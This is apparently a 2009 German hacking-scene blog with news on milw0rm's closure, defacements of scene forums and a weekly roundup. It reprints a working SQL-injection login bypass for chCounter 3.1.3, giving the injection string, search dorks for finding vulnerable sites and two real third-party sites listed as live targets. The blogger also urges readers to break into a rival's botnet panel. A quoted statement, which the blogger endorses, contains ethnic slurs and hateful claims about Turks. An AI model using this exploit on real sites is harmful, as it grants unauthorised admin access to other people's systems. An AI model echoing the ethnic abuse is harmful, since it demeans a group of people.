Goodbye milw0rm?!

Grad eben gefunden:

Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don’t :(. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn’t fair to the authors on this site. I appreciate and thank everyone for their support in the past.
Be safe, /str0ke

Und auch ganz unten steht

submissions are closed.
Videos hosted by Tradebit file hosting
Copyright © 2004-2009 milw0rm

Quelle: http://milw0rm.com/

Finds echt verdammt schade und hoff das er vllt. mal zurueck kommt bzw. weiter macht 🙁

Btw. werd morgen muendliche Pruefung Mathematik haben.. wuenscht mir Glueck 🙂

Neues Hackit : >

RedTiger hat sein Hackit veroeffentlicht.

Kleiner Einfuehrungstext:

This hackit is for people who want to test their knowledge in php / sql security.
It has some similarities to h0yt3r’s and shadowleet’s but it will also test you in some logical ways of thinking.
Be honest. Dont bruteforce the passwords and dont make any solutions public.
Well I am not a friend of long speeches so just start now.

dort koennts u.a. eure SQL Injections Skills unter beweis stellen.

Zu finden ist das hackit hier: http://84.23.65.183/hackit/

Sys-Flaw schließt seine Pforten!

Alte News, ich weiß 😀 Aber da ich dort als S-Moderator vertreten war, halte ich es fuer angemessen darueber zu bloggen:

tmh und ich haben beschlossen Sys-Flaw zu schließen.
Die Gründe dazu sind rein privater Natur und haben nichts mit Internetgeschichten, den Usern oder Ähnlichem zu tun.
Ganz im Gegenteil: Wir wollten uns bei all unseren Mitgliedern bedanken.
Es hat immer Spaß gemacht mit euch, ob im Forum oder im IRC-Channel (indem wir uns natürlich weiterhin treffen werden).
Danke an alle, die sich für Sys-Flaw engagiert und sich eingebracht haben.

Server: irc.datawhore.net
Port: 6667 oder 6697 (SSL)
Channel: #sys-flaw

Damit die ganzen schönen Threads nicht im Nichts verschwinden könnt ihr Sys-Flaw hier später als HTML-Archiv Downloaden.

Das HTML Archiv von Sys-Flaw gibts hier: *klick*

Quasi owned..

.. wuerde hoohead nun sagen 😀

Gestern am 17.04.2009 war anscheinend einiges los. Scriptload wurde “im namen von The Don” (ein Admin aus scriptzbase.org) defaced. War er natuerlich nicht, wie man sehen kann. Sowas wuerde er nie schreiben.

–>

Quelle & mehr: http://newsbox.cc/hacked-ddosed-defaced/scriptload-gehackt/

Dann folgte wieder eine Seite, diesmal undergroundimagez ein Projekt von The Don.

–>

Quelle & mehr: http://newsbox.cc/hacked-ddosed-defaced/undergroundimagez-gehackt/

Und da alle guten Dinge 3 sind, hat es danach nochmal eine große Seite getroffen, naemlich Scriptzbase.org – Admins sind dort Pyth@n und The Don.

Hier nochmal zuerst das kleine Statement:

Leider wurden wir die Nacht Opfer eines Hack-Angriffs
Wir bleiben nun doch erstmal Offlin bis zur klärung
Dann erstmal sehen wie es weiter geht und ob es überhaupt weiter geht

Fuck of Türke

Es ist doch immer wieder schade wie sich die scheiß Szene selber wenichten tut, Kinder übernehmen die Szene immer mehr

Scriptzbase.org hat nicht mit dem hack-Angriff auf Scriptload zu tun.

Und dann das etwas groessere:

Mehr pech kann man glaubich nicht haben, erst läuft alles schief bezüglich des Umzugs.
Dateiload nimmt unseren root vom Netz, ohne uns den neuen zur verfügung zu stellen, dann sollen wir 1 1/2 – 2 Wochen warten,
bis der neue da ist. Darauf hatten wir aber kein bock, The Don hat stress geschoben, da wir ein reibunglosen Umzug haben wollten.
Dann stellte Dateiload uns den ALTEN wieder hin. Wegen dem Stress nahm man uns den Account Manager (zurecht), jetzt sollen wir den jetztigen root kündigen bevor wir den neuen bekommen *lol*.

In der Nacht zum 17.02 wurde ScriptzBase Opfer eines Hack-Angriffes, wie dies passiert ist, wissen wir selber noch nicht!.
Fest steht, es waren wie immer diese kleine mießen Türken. Diese Kündigen an ein Backup Online zu stellen.

Auch Speedtest von 1337-Crew versuchte uns zu Hacken, durch eine Lücke in VB trug er eine E-Mail adresse in die Administratoren Accounts ein, die damals noch zur seiner Seite heihachi.net führte.
vermutlich weil ich heihachi.net als inkompetenter Hoster bezeichnete und diesen Hoster auf ScriptzBase Zensur.
Wo ich mit Account-Shop drauf gehostet habe, war meine Seite mehr down als alles andere. Hosting ist kein Kuchenbacken.

Wie es jetzt weiter geht weiß ich noch nicht, ich habe ehrlich keine lust mehr auf ScriptzBase.
Wir stellen User vieles KOSTENLOS zur verfügung, geben monatlich viel Geld für den scheiß root aus, seid es ScriptzBase gibt habe ich schon über 3000€ dafür aus gegeben.
Wozu dies alles?, für diese scheiß Szene, die nur nimmt und nichts gibt, für User die auf ScriptzBase aktiv leechen, aber Scriptzbase hassen tun, und alles daran setzen uns zu schaden, uns mit Füßen Größe 52 treten!.

Aber Ihr habt ja noch eure Englischen freunde, die Deutsche Szene wird immer mehr verschwinden, und das nur wegen dummen Leuten,
die meinen, sich beweisen zu müssen und mehr schaden anrichten als sie gutes tun.
Solche dummen Menschen werden dann auch noch bejubelt wie (Saddam Hussein) der alles in namen Allah tut!*Lach*,
damit diese sich freuen können.
Die Türkischen hacker denken Sie tuen alles für Allah, denken wenn sie Terror laufen, Seiten hacken das diese gutes tun *Pfff*.
Sobald man eine Türkische Seite hacken tut, laufen diese Terror und töten Menschen, wir Deutschen essen doch lieber Kartoffeln!
Türken schaden mehr das Internet als jedes andere Volk, sie verstehen nicht wofür Gemeindschaft steht, Freude, Spass, Freundschaft.

Bald wird es bestimmt noch eine Deutsche Script Seite geben, die aber auch schnell offline geht *lach*
Ist das schön wenn dumme leute sich selber ins Bein schießen, das auch noch toll finden.

Mein motto war immer “Hack niemals Szene Seiten, es sei denn die sachden dich selber massiv” vTeam-Germany wurde damals von mir gehackt, weil dies zutraf, nicht OHNE grund.

Leute mögen mich “PyTh@n” nicht weil die mich nicht kennen, Sie Urteilen über mich einfach, erzählen scheiße, machen mit meinen Nick irgend eine scheiße auf andere Seiten. Und jetzt kommen die ganzen Kinder aus den löchern die meinen etwas über SB zu wissen, erzählen irgend eine scheiße, wissen nichtmal was diese damit selber bezwecken wollen.

Ich werde die nächsten Tage darüber nachdenken, ob es sich noch lohnt die ganze scheiße für Leute zu machen die dich doch eigl hassen, die dir schaden wollen!.
Ob sich das lohnt, Monat für Monat gedanken zu machen woher ich das Geld für den root nehme.
Ob sich das Lohnt evtl meine zukunft durch Warez zu versauen.
Ob sich der ganze Stress und ärger Lohnt!.

In dem ScriptzBase Backup stehen IP-Adresse der User drinne, es ging einfach nicht mehr ohne logging, die User haben zu viel scheiße gebaut, wollten schaden anrichten.
Auch wenn wir auf Sicherheit der User achteten mussten wir auch selber auf Unsere achten, IP logging wollten wir nach dem Umzug Temporary machen, dazu kam es aber leider nicht mehr.
Uns war immer klar das das BKA niemals an unseren root kommen würde, wenn dann wäre alles ganz schnell weg;)
User müssen aber keine Angst haben vor Besuch des BKA;), wer sich gedanken macht, macht sich lächerlich;).

Auf diesen wegen Sorry für das Loggen, in der Szene geht es leider nicht mehr OHNE. 1337 macht es selber nicht anderes!.

Wie gesagt wir wissen nicht ob es überhaupt weiter geht, ich werde die Tage darüber nach denken.
Ich werde nur auf Diskussionen im Newsbox.cc Forum antworten.

Die ScriptzBase Administration
PyTh@n

E-Mail: [email protected]

PS: ScriptzBase wäre die Tage 2 Jahre geworden!

Quelle: http://scriptzbase.org/

Ich stimme der Aussage von Pyth@n voll und ganz zu und ich denke er hat mit seinem Statement auch recht. Es gibt nur eine positive Sache zu sagen “defaces” sind wenigsten was anderes als langweiliger Dauer DDoS. Deface zeigt naemlich immerhin etwas koennen, was man bei DDoS nicht behaupten kann.

Aufjedenfall hoff ich, dass sich die Admins von Scriptzbase schnell erholen und am Projekt weitermachen.. Scriptzbase war nen tolles Forum. 🙂

Was gibts sonst noch interessantes zu berichten.. ah -tmh- hat mal wieder nen Exploit auf milw0rm veroeffentlicht, es handelt sich mal wieder um einen Login Bypass, sehr gefaehrlich das ganze, da man innerhalb von sekunden und ohne große Anstrengung zum Admin werden kann:

########################################################################################################################
#chCounter 3.1.3 Login Bypass
#=======================================================================================================================
#
#Critical Level : Dangerous
#
#Vendor site : http://chcounter.org/
#
#Download : http://chcounter.org/chCounter3/getfile.php?id=5
#
#dorks: "chCounter 3.1.3" Künftig automatisch einloggen or "chCounter 3.1.3"
#
#=======================================================================================================================
#
#
#Information :
#--------------------------------
#Need: magic quotes = off
#
#Exploit :
#--------------------------------
#
#http://www.[URL]//counter/stats/index.php
#
#Use or '=' as username and password
#
#
#Live demo :
#--------------------------------
#
#http://www.brummelliese.de/count/stats/
#http://www.fire.uni-freiburg.de/counter/welcome/stats/
#
#=======================================================================================================================
#Discovered by : -tmh- & Lainux
#
#Contact : tmh[at]sys-flaw.com
#
#Greetz to : n00bor , activebeta, Five-Three-Nine ,GabberGandalf, J0hn.X3r , electron1x , Lainux, PurpleD1amond , Sebo , Z1uX , meckl , Floo , -Patrick_B ,
#abcdef ,Loader007 , bizzit , Barbers , dev0815 , f0Gx , h0yt3r , Nemo , eddy14 , Sys-Flaw , Codesoft ,Free-Hack
#
#
########################################################################################################################

# milw0rm.com [2009-04-16]

Quelle: http://www.milw0rm.com/exploits/8461

Danke nochmal fuer das Erwaehnen in den Greetz 🙂

Was gibts noch aktuelles zu sagen? Vorerst nichts, wird jedoch heute noch etwas folgen 🙂

Wochenuebersicht

Aloha zu meiner 3ten Wochenuebersicht. Heute fasse ich mich kurz, da ich erst in 2 Tagen Ferien hab, und dann auch mehr Zeit zum Bloggen finde. Sind in letzter Zeit weniger schoene Dinge passiert, aber nun gut.

Fangen wir an. Punkt 1: Es geht mal wieder um das tolle Elite Scene Board No. 1 von luppa, auch bekannt als “Dark Matrix”. Hatte schon mehrmals von ihnen berichtet, nun kommen noch 2 Knueller:

Dark Matrix Forum wurde innerhalb von 3 Wochen nun zum 2ten Mal defaced, diesmal von T-Slide, Admin von Pro-Hack.eu, am 1. April 2009:

Wenn man sich die Signatur von luppa anschaut, sieht man gleich den Knueller Nr.2: “King of Botnet”. Der Trottel nennt sich “King Of Botnet” welches sich hier befindet: http://dark-matrix.com/botnet/ UND nicht mehr als 200 – 600 Bots hat.. das nenn ich KING! Diese Person ist sowas von laecherlich.. Vllt kann sich ja jemand den Zugang erbruten oder findet luecken.. ich wuerd alle Vics loeschen..

Punkt 2: Der 1. April war nen “unterhaltsamer” Tag, an dem einige Leute witzig sein wollten. Hier nen paar Auszuege:

– xREL.to machte einen auf “hacked” und stellte die komplette Seite in 1337 “Schrift” dar

– scriptzbase.org machte einen auf hacked/defaced und dabei wurde dann auch eine Handynummer von Pyth@n (glaub ich) und die DB von account-shop.ws veroeffentlicht, war aber schlussendlich nen großer Spaß (siehe http://scriptzbase.org/showthread.php?t=24012 )

– Kartoffel-Hack Source wurde von -tmh- veroeffentlicht jedoch mit einem (anscheinend) 97 stelligem PW 😀 Viel Spaß beim Bruteforce^^

– gulli hatte auch was gebracht, weiß aber grad nicht genau mehr was

Und najo noch einige mehr.

Punkt 3: Sebo hat sein 2filehost Projekt nun unter neuem Namen wieder geboren, naemlich  LoadNow.in. Ist wie 2filehost.cn damals, nen Premium Link Generator gewesen, nur diemal (Achtung Neu!) mit Megaupload 🙂 Er plant auch eventuell Uploaded.to dazu zu nehmen. Und ich weiß durch sichere Quellen, dass sein Projekt morgen auf eine neue Server Hardware umsteigen wird, um bessere Performance zu bieten. Was gibts noch groß zu sagen? Ah eine Aktion, welche ich ganz gut finde:

Punkt 4:

tr4st.NET against YouTube Spreader

Eine echt tolle Aktion. Auf tr4st.NET stellt tr4st ein paar YouTube Videos vor, mit einem anscheinenden “Easy Steam Account Hacker” oder aehnliches, bei dem Ahnungslose Leute “verarscht” werden und dann schlussendlich ihren Steam Account durch diese infizierten Tools verlieren. Ich find die Aktion echt gut, dass tr4st hier die Videos / Downloads aufdeckt und zeigt, dass es infiziert ist und wo die Logs dann landen.

Punkt 5: Scene Coderz.com sagt Ade. Ein kleiner Ausschnitt aus dem Statement:

Heute Abend ist das Fass einfach übergelaufen!

Nein es hat nichts mit dem DDoS zu tun, der täglich auf unseren Server einprasselte, auch nicht mit den Beleidigungen, welche ich täglich erntete und auch nicht weil es mir zu viel Arbeit gemacht hat Spam zu löschen, die Projekte zu verwalten oder Kunden zu supporten. Nein, irgendwo hat es sich eigentlich zu einem Hobby entwickelt und ich muss sagen es war geil mit Euch. Vom Start von DelphiCoderZ bis zum heutigen Ende von SC. Wir waren eine Art große Familie, doch das ist nun Geschichte. Vielen Dank an alle User und Alle die uns immer unterstützt haben. Ich will hier nun keinen genauen Grund angeben wie es dazu kam und hoffe, dass hier Niemand irgendwelchem Müll erzählt (Wir wurden weder Hacked noch busted!).

Bevor auch nur eine Anfrage kommt, ich habe den Usern versprochen, ihre Daten vertraulich zu behandeln, so wird es bleiben!
Es wird hier KEIN Backup verkauft.

ICQ: 218406

Quelle & mehr: SceneCoderZ

Finds echt schade, dass in letzter Zeit immer mehr “Scene” Seiten und Projekte gehen bzw. beendet werden. Vorallem find ich es auch schade und “scheiße”, dass es Leute gibt, die DDoS anbieten, zwar unter dem Vorwand “Scene Seiten werden nicht geDDoSt. Aber anfragen schadet nicht” – Find ich nicht in Ordnung und ich denke die meisten wissen, wen ich damit meine.

Najo das wars soweit erstmal von meiner kleinen Wochenuebersicht, hab noch bis Dienstag Schule und dann endlich Ferien, kann dann wieder etwas aktiver werden 😉